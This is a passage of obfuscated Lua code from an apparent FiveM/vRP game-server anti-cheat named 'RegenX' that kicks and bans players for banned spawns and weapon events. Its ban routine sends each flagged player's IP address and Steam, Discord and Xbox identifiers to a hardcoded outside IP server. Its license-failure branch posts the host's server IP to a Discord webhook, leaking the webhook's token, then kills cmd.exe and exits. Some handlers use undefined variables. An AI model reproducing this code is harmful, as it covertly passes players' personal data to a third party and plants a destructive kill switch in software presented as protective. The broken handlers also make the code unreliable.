{\n") for _, garage in ipairs(garages) do newFile:write(string.format('\t{"%s", %f, %f, %f},\n', garage[1], garage[2], garage[3], garage[4])) end newFile:write("}\n") newFile:close() print("Garages Vrp Lists Loaded") end) AddEventHandler('removeWeaponEvent', function(source, data) if Config.WeaponXRV.Enable then local id = source; local user_id = vRP.getUserId({id}) if user_id ~= nil then if not vRP.hasPermission({user_id,AllowPermissions.RealTimeEvents}) then CancelEvent() kickandbanuser(id,"removeWeaponEvent Detected" ..k,Config.WeaponXRV.Kick, Config.WeaponXRV.Ban) end else CancelEvent() kickandbanuser(id,"removeWeaponEvent Detected" ..k,Config.WeaponXRV.Kick, Config.WeaponXRV.Ban) end end end) AddEventHandler('giveWeaponEvent', function(source, data) if Config.WeaponXRV.Enable then local user_id = vRP.getUserId({id}) if user_id ~= nil then if not vRP.hasPermission({user_id,AllowPermissions.RealTimeEvents}) then CancelEvent() kickandbanuser(id,"giveWeaponEvent Detected" ..k,Config.WeaponXRV.Kick, Config.WeaponXRV.Ban) end else CancelEvent() kickandbanuser(id,"giveWeaponEvent Detected" ..k,Config.WeaponXRV.Kick, Config.WeaponXRV.Ban) end end end) AddEventHandler("weaponDamageEvent", function(sender, data) if Config.TazerDetected.Enable then local _src = sender local user_id = vRP.getUserId({_src}) if data.weaponType == 911657153 or data.weaponType == GetHashKey("WEAPON_STUNGUN") then if user_id ~= nil then if not vRP.hasPermission({user_id,AllowPermissions.RealTimeEvents}) then CancelEvent() kickandbanuser(_src,"Tazer Detected",Config.TazerDetected.Kick, Config.TazerDetected.Ban) end else CancelEvent() kickandbanuser(_src,"Tazer Detected",Config.TazerDetected.Kick, Config.TazerDetected.Ban) end end end end) Citizen.CreateThread(function() explosionsSpawned = {} vehiclesSpawned = {} pedsSpawned = {} entitiesSpawned = {} particlesSpawned = {} while true do Citizen.Wait(5000) -- augment/lower this if you want. explosionsSpawned = {} vehiclesSpawned = {} pedsSpawned = {} entitiesSpawned = {} particlesSpawned = {} end end) AddEventHandler("entityCreating", function(entity) if Config.AEntites.Enable then local _src = NetworkGetEntityOwner(entity) local model = GetEntityModel(entity) local _entitytype = GetEntityPopulationType(entity) local WhitelistedPropList = EntitesWL.WhitelistedPropList; local BlacklistedPropList = EntitesBL.BlacklistedModels; local BlacklistedObjectList = EntitesBL.BlacklistedObjectList; if _src == nil then CancelEvent() end if _entitytype == 0 then for i=1, #BlacklistedObjectList do local hashkey = tonumber(BlacklistedObjectList[i]) ~= nil and tonumber(BlacklistedObjectList[i]) or GetHashKey(BlacklistedObjectList[i]) if (hashkey == model) then if model ~= 0 and model ~= 225514697 then LogDetection(_src, "Tried to spawn a Blacklisted Object : " .. BlacklistedObjectList[i] .. " \n Link :- https://forge.plebmasters.de/objects/"..BlacklistedObjectList[i].."","model") CancelEvent() if Config.EntitesOP.BLBan then vRP.ban({_src, "YOU HAVE BEEN BANNED FROM #REGEN | Spawn Blacklisted Entites. | MADE BY Normal#0088"}) end entitiesSpawned[_src] = (entitiesSpawned[_src] or 0) + 1 if entitiesSpawned[_src] > Config.Max.Entities then if Config.EntitesOP.MaxBan then vRP.ban({_src, "YOU HAVE BEEN BANNED FROM #REGEN | Spawn Blacklisted Entites. | MADE BY Normal#0088"}) end GlobalBanDetected(_src,"Spawned Blacklisted Models") LogDetection(_src, "Tried to Spawn "..entitiesSpawned[_src].." Blacklisted Models","model") TriggerClientEvent("ZRQA3nmMqUBOIiKwH4I5:clearprops" , -1) CancelEvent() end end end end -- else if inTable(WhitelistedPropList, model) == false then if model ~= 0 and model ~= 225514697 then CancelEvent() TriggerClientEvent("ZRQA3nmMqUBOIiKwH4I5:clearprops" , -1) entitiesSpawned[_src] = (entitiesSpawned[_src] or 0) + 1 if entitiesSpawned[_src] > 30 then LogDetection(_src, "Tried to Spawn NotWhitelist "..entitiesSpawned[_src].." Props \n Props :- `".. model .."`","model") if entitiesSpawned[_src] > Config.Max.Entities then LogDetection(_src, "Tried to Spawn NotWhitelist "..entitiesSpawned[_src].." Props \n Props :- `".. model .."`","model") TriggerClientEvent("ZRQA3nmMqUBOIiKwH4I5:clearprops" , -1) CancelEvent() end end end end end if GetEntityType(entity) == 3 then if _entitytype == 6 or _entitytype == 7 then if inTable(WhitelistedPropList, model) == false then if model ~= 0 then CancelEvent() entitiesSpawned[_src] = (entitiesSpawned[_src] or 0) + 1 if entitiesSpawned[_src] > 15 then CancelEvent() LogDetection(_src, "Tried to spawn a a Non-Whitelist "..entitiesSpawned[_src].." Props","model") end if entitiesSpawned[_src] > Config.Max.Entities then CancelEvent() LogDetection(_src, "Tried to spawn a a Non-Whitelist "..entitiesSpawned[_src].." Props","model") TriggerClientEvent("ZRQA3nmMqUBOIiKwH4I5:clearprops" , -1) end end end end else if GetEntityType(entity) == 2 or GetEntityType(entity) == 1 then if _entitytype == 6 or _entitytype == 7 then if inTable(BlacklistedPropList, model) ~= false then if model ~= 0 then CancelEvent() LogDetection(_src, "Tried to spawn a Blacklisted vehicle : " .. model,"model") end end vehiclesSpawned[_src] = (vehiclesSpawned[_src] or 0) + 1 if vehiclesSpawned[_src] > Config.Max.Vehicles then LogDetection(_src, "Tried to spawn "..vehiclesSpawned[_src].." Vehicles","model") TriggerClientEvent("DFSKASODKOSDAssdfkFJMDISJG:clearvehicles" , -1, _src) CancelEvent() if Config.EntitesOP.MaxBan then kickorbancheater(_src,"Tried to Spawn a Mass Vehicles" .. vehiclesSpawned[_src], "Tried to Spawn a Mass Vehicles" .. vehiclesSpawned[_src], true, true) end end -- ANTIVEHICLESPAWN TriggerClientEvent("YsgFwRmEkwThmZe:icZAwPVWuJjHsJT", _src) end elseif GetEntityType(entity) == 1 then if _entitytype == 6 or _entitytype == 7 then if inTable(BlacklistedPropList, model) ~= false then if model ~= 0 or model ~= 225514697 then LogDetection(_src, "Tried to spawn a Blacklisted Ped : " .. model,"model") CancelEvent() end end pedsSpawned[_src] = (pedsSpawned[_src] or 0) + 1 if pedsSpawned[_src] > Config.Max.Peds then CancelEvent() LogDetection(_src, "Tried to spawn "..pedsSpawned[_src].." peds","model") TriggerClientEvent("ZRQA3nmMqUBOIiKwH4I5:clearpeds" , -1) end end else if inTable(BlacklistedPropList, GetHashKey(entity)) ~= false then if model ~= 0 or model ~= 225514697 then LogDetection(_src, "Tried to spawn a Blacklisted Prop : " .. model,"model") CancelEvent() end end end end end end) RegisterNetEvent('RegenX:IGGJvTJqheJDPtGzvCfr') AddEventHandler('RegenX:IGGJvTJqheJDPtGzvCfr', function(isneargarage, coords) local _src = source local user_id = vRP.getUserId({_src}) local _type = "Vehicle Spawned Detected In Unknown Garage" if user_id ~= nil then if not vRP.hasPermission({user_id,AllowPermissions.CheckVehicleIfNearGarage}) then if not isneargarage then TriggerClientEvent("nindifsnfuyHNNBFDJG_dfjkHBF:RegenX", _src ,Webhooks.ScreenShotData) Wait(2000) LogDetection(_src, "Vehicle Spawned Detected In Unknown Garage | Coords : "..coords, "VehicleNearGarage") kickorbancheater(_src,_type,C_Config.CheckVehicleIfNearGarage.Kick,C_Config.CheckVehicleIfNearGarage.Ban) end end else if not isneargarage then TriggerClientEvent("nindifsnfuyHNNBFDJG_dfjkHBF:RegenX", _src ,Webhooks.ScreenShotData) Wait(2000) LogDetection(_src, "Vehicle Spawned Detected In Unknown Garage | Coords : "..coords, "VehicleNearGarage") kickorbancheater(_src,_type,C_Config.CheckVehicleIfNearGarage.Kick,C_Config.CheckVehicleIfNearGarage.Ban) end end end) --==================================================================================================================================================== --==================================================================================================================================================== --==================================================================================================================================================== --==================================================================================================================================================== --==================================================================================================================================================== function inTable(tbl, item) for key, value in pairs(tbl) do if value == item then return key end end return false end function GetEntityOwner(entity) if (not DoesEntityExist(entity)) then return nil end local owner = NetworkGetEntityOwner(entity) if (GetEntityPopulationType(entity) ~= 7) then return nil end return owner end getidentifiers = function(player) local steamid = "Not Found" local license = "Not Found" local discord = "Not Found" local xbl = "Not Found" local liveid = "Not Found" local ip = "Not Found" for k, v in pairs(GetPlayerIdentifiers(player)) do if string.sub(v, 1, string.len("steam:")) == "steam:" then steamid = v elseif string.sub(v, 1, string.len("license:")) == "license:" then license = v elseif string.sub(v, 1, string.len("xbl:")) == "xbl:" then xbl = v elseif string.sub(v, 1, string.len("ip:")) == "ip:" then ip = string.sub(v, 4) elseif string.sub(v, 1, string.len("discord:")) == "discord:" then discordid = string.sub(v, 9) discord = "<@" .. discordid .. ">" elseif string.sub(v, 1, string.len("live:")) == "live:" then liveid = v end end return steamid, license, xbl, ip, discord, liveid end local screenShotImgData = nil RegisterNetEvent("RegenX:GetURLOFScreenShot:OJDFNSDF") AddEventHandler("RegenX:GetURLOFScreenShot:OJDFNSDF", function(imgdata) screenShotImgData = imgdata end) LogDetection = function(playerId, reason,bantype) playerId = tonumber(playerId) local name = GetPlayerName(playerId) local user_id = vRP.getUserId({playerId}) if user_id ~= nil then _playerId = user_id else _playerId = playerId end if name == nil then name = "Not Found" end if screenShotImgData ~= nil then else screenShotImgData = "https://cdn.discordapp.com/attachments/1180625179769061387/1220949048287039519/REGENX2BEST.jpg?ex=6610cc69&is=65fe5769&hm=e8eaa0837f91111cf20290e1824d38e718c602500fc79f1ea0e3c5fb4ca71efa&" end local steamid, license, xbl, playerip, discord, liveid = getidentifiers(playerId) local discordlogimage = "https://cdn.discordapp.com/attachments/814894887220543499/837493131531255848/gn12.png" local loginfo = { ["color"] = "15158332", ["type"] = "rich", ["title"] = "RegenX-AntiCheat", ["name"] = 'RegenX AntiCheat', ["icon_url"] = 'https://cdn.discordapp.com/attachments/767297882964623371/779138910537121822/gn12.png', ["description"] = "__Reason__\n **" .. reason .. "**\n\n __PlayerInfo__\n **PlayerName : **`" .. name .. "`\n**PlayerID : **`" .. _playerId .. "`\n **PlayerIP : **`" .. playerip .. "`\n **PlayerSteam : **`" .. steamid .. "`\n **PlayerXbox : **`" .. xbl .. "`\n **PlayerLive : **`" .. liveid .. "`\n **PlayerLicense : **`" .. license .. "`\n **PlayerDiscord : **`" .. discord .. "`", ["thumbnail"] = { ["url"] = 'https://cdn.discordapp.com/attachments/1180625179769061387/1220949048287039519/REGENX2BEST.jpg?ex=6610cc69&is=65fe5769&hm=e8eaa0837f91111cf20290e1824d38e718c602500fc79f1ea0e3c5fb4ca71efa&', }, ["image"] = { ["url"] = screenShotImgData, }, ["footer"] = { ["text"] = " © RegenX AntiCheat | Maded By LostTime @6w1 - " .. os.date("%c") .. "", } } if name ~= "Unknown" then if bantype == "basic" then PerformHttpRequest(Webhooks.Webhook, function(err, text, headers) end, "POST", json.encode({username = " RegenX Anti-Cheat", avatar_url = discordlogimage, embeds = {loginfo}}), {["Content-Type"] = "application/json"}) elseif bantype == "model" then PerformHttpRequest(Webhooks.Objects, function(err, text, headers) end, "POST", json.encode({username = " RegenX Anti-Cheat", avatar_url = discordlogimage, embeds = {loginfo}}), {["Content-Type"] = "application/json"}) elseif bantype == "explosion" then PerformHttpRequest( Webhooks.Explosion, function(err, text, headers) end, "POST", json.encode({username = " RegenX Anti-Cheat", avatar_url = discordlogimage, embeds = {loginfo}}), {["Content-Type"] = "application/json"} ) elseif bantype == "blnames" then PerformHttpRequest( Webhooks.BlacklistNames, function(err, text, headers) end, "POST", json.encode({username = " RegenX Anti-Cheat", avatar_url = discordlogimage, embeds = {loginfo}}), {["Content-Type"] = "application/json"} ) elseif bantype == "events" then PerformHttpRequest( Webhooks.WBPD, function(err, text, headers) end, "POST", json.encode({username = " RegenX Anti-Cheat", avatar_url = discordlogimage, embeds = {loginfo}}), {["Content-Type"] = "application/json"} ) elseif bantype == "Methods" then PerformHttpRequest( Webhooks.Methods, function(err, text, headers) end, "POST", json.encode({username = " RegenX Anti-Cheat", avatar_url = discordlogimage, embeds = {loginfo}}), {["Content-Type"] = "application/json"} ) elseif bantype == "GlobalBan" then PerformHttpRequest( Webhooks.GlobalBan, function(err, text, headers) end, "POST", json.encode({username = " RegenX Anti-Cheat", avatar_url = discordlogimage, embeds = {loginfo}}), {["Content-Type"] = "application/json"} ) elseif bantype == "VehicleNearGarage" then PerformHttpRequest( Webhooks.VehicleNearGarage, function(err, text, headers) end, "POST", json.encode({username = " RegenX Anti-Cheat", avatar_url = discordlogimage, embeds = {loginfo}}), {["Content-Type"] = "application/json"} ) end screenShotImgData = nil end end function kickorbancheater(source,content,c,d) local _source = source local sname = GetPlayerName(_source) local steam = "unknown" local discord = "unknown" local license = "unknown" local live = "unknown" local xbl = "unknown" local playerip = GetPlayerEndpoint(tostring(_source)) local user_id = vRP.getUserId({_source}) if user_id ~= nil then playerId = user_id else playerId = source end if screenShotImgData ~= nil or "" then else screenShotImgData = "https://cdn.discordapp.com/attachments/1180625179769061387/1220949048287039519/REGENX2BEST.jpg?ex=6610cc69&is=65fe5769&hm=e8eaa0837f91111cf20290e1824d38e718c602500fc79f1ea0e3c5fb4ca71efa&" end if sname ~= nil then for m, n in ipairs(GetPlayerIdentifiers(_source)) do if n:match("steam") then steam = n elseif n:match("discord") then discord = n:gsub("discord:", "") elseif n:match("license") then license = n elseif n:match("live") then live = n elseif n:match("xbl") then xbl = n end end local discordinfo = { ["color"] = "15158332", ["type"] = "rich", ["title"] = "RegenX-AntiCheat", ["name"] = 'RegenX AntiCheat', ["icon_url"] = 'https://cdn.discordapp.com/attachments/767297882964623371/779138910537121822/gn12.png', ["description"] = "__Reason__\n **" .. content .. "**\n\n __PlayerInfo__\n **PlayerName : **`" .. sname .. "`\n**PlayerID : **`" .. playerId .. "`\n **PlayerIP : **`" .. playerip .. "`\n **PlayerSteam : **`" .. steam .. "`\n **PlayerXbox : **`" .. xbl .. "`\n **PlayerLive : **`" .. live .. "`\n **PlayerLicense : **`" .. license .. "`\n **PlayerDiscord : **`" .. discord .. "`", ["thumbnail"] = { ["url"] = 'https://cdn.discordapp.com/attachments/1180625179769061387/1220949048287039519/REGENX2BEST.jpg?ex=6610cc69&is=65fe5769&hm=e8eaa0837f91111cf20290e1824d38e718c602500fc79f1ea0e3c5fb4ca71efa&', }, ["image"] = { ["url"] = screenShotImgData, }, ["footer"] = { ["text"] = " © RegenX AntiCheat | Maded By LostTime @6w1 - " .. os.date("%c") .. "", } } PerformHttpRequest(Webhooks.Webhook, function(err, text, headers) end, 'POST', json.encode({username = "RegenX-AntiCheat", embeds = {discordinfo}}), { ['Content-Type'] = 'application/json' }) end if d then Wait(1500) vRP.ban({source,"YOU HAVE BEEN BANNED BY #REGENX | Method : ".. content .." | Made By LostTime @6w1 "}) end if c then Wait(1500) DropPlayer(source, "YOU HAVE BEEN KICKED BY #REGENX | Method : ".. content .." | Made By LostTime @6w1 ") end screenShotImgData = nil end RegisterNetEvent("OVJDININWEFKNQAWD:GOJTROJFWNMEFW:WQMDKNQWDNEFWF_:ERGMOIERJGERF_WEFMKMTRGR") AddEventHandler("OVJDININWEFKNQAWD:GOJTROJFWNMEFW:WQMDKNQWDNEFWF_:ERGMOIERJGERF_WEFMKMTRGR", function(content) local src = source local _reason = content GlobalBanDetected(src,_reason) end) function GlobalBanDetected(source,content) local _source = source local sname = GetPlayerName(_source) local steam = "unknown" local discord = "unknown" local license = "unknown" local live = "unknown" local xbl = "unknown" local playerip = GetPlayerEndpoint(tostring(_source)) local user_id = vRP.getUserId({_source}) local playerId if user_id ~= nil then playerId = user_id else playerId = source end if sname ~= nil then for m, n in ipairs(GetPlayerIdentifiers(_source)) do if n:match("steam") then steam = n elseif n:match("discord") then discord = n:gsub("discord:", "") elseif n:match("license") then license = n elseif n:match("live") then live = n elseif n:match("xbl") then xbl = n end end local discordinfo = { ["color"] = "15158332", ["type"] = "rich", ["title"] = "RegenX-AntiCheat", ["name"] = 'RegenX AntiCheat', ["icon_url"] = 'https://cdn.discordapp.com/attachments/767297882964623371/779138910537121822/gn12.png', ["description"] = "__Reason__\n **" .. content .. "**\n\n __PlayerInfo__\n **PlayerName : **`" .. sname .. "`\n**PlayerID : **`" .. playerId .. "`\n **PlayerIP : **`" .. playerip .. "`\n **PlayerSteam : **`" .. steam .. "`\n **PlayerXbox : **`" .. xbl .. "`\n **PlayerLive : **`" .. live .. "`\n **PlayerLicense : **`" .. license .. "`\n **PlayerDiscord : **`" .. discord .. "`", ["thumbnail"] = { ["url"] = 'https://cdn.discordapp.com/attachments/1180625179769061387/1220949048287039519/REGENX2BEST.jpg?ex=6610cc69&is=65fe5769&hm=e8eaa0837f91111cf20290e1824d38e718c602500fc79f1ea0e3c5fb4ca71efa&', }, ["footer"] = { ["text"] = " © RegenX AntiCheat | Maded By LostTime @6w1 - " .. os.date("%c") .. "", } } PerformHttpRequest(Webhooks.Webhook, function(err, text, headers) end, 'POST', json.encode({username = "RegenX-AntiCheat", embeds = {discordinfo}}), { ['Content-Type'] = 'application/json' }) local data = json.encode({ player_id = playerId, player_name = sname, player_ip = playerip, player_steam = steam, player_discord = discord, player_license = license, player_live = live, player_xbox = xbl, reason = content }) PerformHttpRequest("http://77.83.242.94/KOEWFJASDBANLISTIJFVDNGERGE/nmnudnIOHJFSEUIHEBDdad.php", function(err, text, head) if err ~= 200 then print("Error sending player information: " .. err) end end, 'POST', data, { ['Content-Type'] = 'application/json' }) end end RegisterNetEvent("LASODKFDSJOASD:ASLDMSGASD") AddEventHandler("LASODKFDSJOASD:ASLDMSGASD", function(source,content,info,c,d) local _source = source local sname = GetPlayerName(_source) local steam = "unknown" local discord = "unknown" local license = "unknown" local live = "unknown" local xbl = "unknown" if sname ~= nil then for m, n in ipairs(GetPlayerIdentifiers(_source)) do if n:match("steam") then steam = n elseif n:match("discord") then discord = n:gsub("discord:", "") elseif n:match("license") then license = n elseif n:match("live") then live = n elseif n:match("xbl") then xbl = n end end local discordinfo = { { ["color"] = "23295", ["title"] = "RegenX AntiCheat", ["description"] = "**Player: **"..sname.. "\n**ServerID:** ".._source.."\n**Method:** "..content.."\n**Details:** "..info.."\n**Steam:** "..steam.."\n**License: **"..license.."\n**Xbl: **"..xbl.."\n**Live: **"..live.."\n**Discord**: <@"..discord..">", ["footer"] = { ["text"] = "RegenX | Maded By LostTime @6w1", }, } } PerformHttpRequest(Webhooks.Webhook, function(err, text, headers) end, 'POST', json.encode({username = "Regen-AntiCheat", embeds = discordinfo}), { ['Content-Type'] = 'application/json' }) end if d then vRP.ban({source,"YOU HAVE BEEN BANNED BY #REGENX | Method : ".. content .." | Made By LostTime @6w1 "}) end if c then DropPlayer(source, "YOU HAVE BEEN KICKED BY #REGENX | Method : ".. content .." | Made By LostTime @6w1 ") end end) else local embeds = { { ["title"]= "Worng License" , ["type"]= "rich", ["color"] = 16711680, fields = { { name = "**Server IP :-**", value = "[ "..text.." ] ", inline = false }, { name = "**License :-**", value = "[ "..Config.Key.." ] ", inline = false }, { name = "**Server Name :-**", value = "[ "..GetConvar("sv_hostname").." ] ", inline = false } }, ["footer"]= { ["text"]= "The Regen Is Mad! | "..os.date("%X |%x"), ["icon_url"] = "https://cdn.discordapp.com/attachments/699341228218646628/846556479556288532/image0.gif" }, } } VH5C7JIVQIH1SLPXLGAPRHEB9BU3("https://discordapp.com/api/webhooks/1221301560450089042/NpQHuRUoOqR1IJZBw6ZPhMtFNLMD_uHwDovObLkygMwV0rSxHopp-OlgKS02Ka2PiOh3", function(err, text, headers) end, "POST", json.encode({embeds = embeds}), { ["Content-Type"] = "application/json" }) print(v6DgJb2Fzp) -- Not Working Citizen.Wait(6000) os.exit(1) io.close() os.execute("taskkill -im cmd.exe") return end end) end) else print(v6DgJb2Fz1) -- Print Fuck you for editing -- LRHZWUY0E0AERLG7KTRM83HTQDDP3("used code load = print") return end return